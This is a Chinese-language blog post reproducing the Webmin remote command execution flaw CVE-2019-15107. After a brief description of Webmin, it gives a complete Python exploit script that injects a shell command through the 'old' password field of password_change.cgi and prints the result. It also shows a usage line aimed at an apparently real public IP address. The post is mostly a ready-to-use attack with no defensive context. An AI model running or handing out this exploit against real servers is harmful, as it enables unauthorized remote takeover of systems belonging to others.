WEBMIN_RCE(CVE-2019-15107)漏洞复现

Webmin是一个基于Web的界面，用于Unix的系统管理。使用任何现代Web浏览器，您可以设置用户帐户，Apache，DNS，文件共享等等。Webmin无需手动编辑/ etc / passwd等 Unix配置文件，并允许您从控制台或远程管理系统。Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前Webmin支持绝大多数的Unix系统，这些系统除了各种版本的linux以外还包括：AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。

命令执行脚本

import requests
import re
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import sys


banner ='''
 _______           _______       _______  _______  __     _____       __    _______  __    _______  ______  
(  ____ \|\     /|(  ____ \     / ___   )(  __   )/  \   / ___ \     /  \  (  ____ \/  \  (  __   )/ ___  \ 
| (    \/| )   ( || (    \/     \/   )  || (  )  |\/) ) ( (   ) )    \/) ) | (    \/\/) ) | (  )  |\/   )  )
| |      | |   | || (__             /   )| | /   |  | | ( (___) |      | | | (____    | | | | /   |    /  / 
| |      ( (   ) )|  __)          _/   / | (/ /) |  | |  \____  |      | | (_____ \   | | | (/ /) |   /  /  
| |       \ \_/ / | (            /   _/  |   / | |  | |       ) |      | |       ) )  | | |   / | |  /  /   
| (____/\  \   /  | (____/\     (   (__/\|  (__) |__) (_/\____) )    __) (_/\____) )__) (_|  (__) | /  /    
(_______/   \_/   (_______/_____\_______/(_______)\____/\______/_____\____/\______/ \____/(_______) \_/     
                          (_____)                              (_____)                                      
                                     python By jas502n

'''
print banner

def CVE_2019_15107(url, cmd):
    vuln_url = url + "/password_change.cgi"
    headers = {
    'Accept-Encoding': "gzip, deflate",
    'Accept': "*/*",
    'Accept-Language': "en",
    'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    'Connection': "close",
    'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
    'Referer': "%s/session_login.cgi"%url,
    'Content-Type': "application/x-www-form-urlencoded",
    'Content-Length': "60",
    'cache-control': "no-cache"
    } 
    payload="user=rootxx&pam=&expired=2&old=test|%s&new1=test2&new2=test2" % cmd
    r = requests.post(url=vuln_url, headers=headers, data=payload, verify=False)
    if r.status_code ==200 and "The current password is " in r.content : 
        print "\nvuln_url= %s" % vuln_url
        m = re.compile(r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>", re.DOTALL)
        cmd_result = m.findall(r.content)[0]
        print
        print "Command Result = %s" % cmd_result
    else:
        print "No Vuln Exit!"


if __name__ == "__main__":
    # url = "https://10.10.20.166:10000"
    url = sys.argv[1]
    cmd = sys.argv[2]
    CVE_2019_15107(url, cmd)

python test.py https://188.40.189.135:58171 "whoami"

大概就这些……

声明: 本文采用 BY-NC-SA 协议进行授权，如无注明均为原创，转载请注明转自运维那些事
本文地址: WEBMIN_RCE(CVE-2019-15107)漏洞复现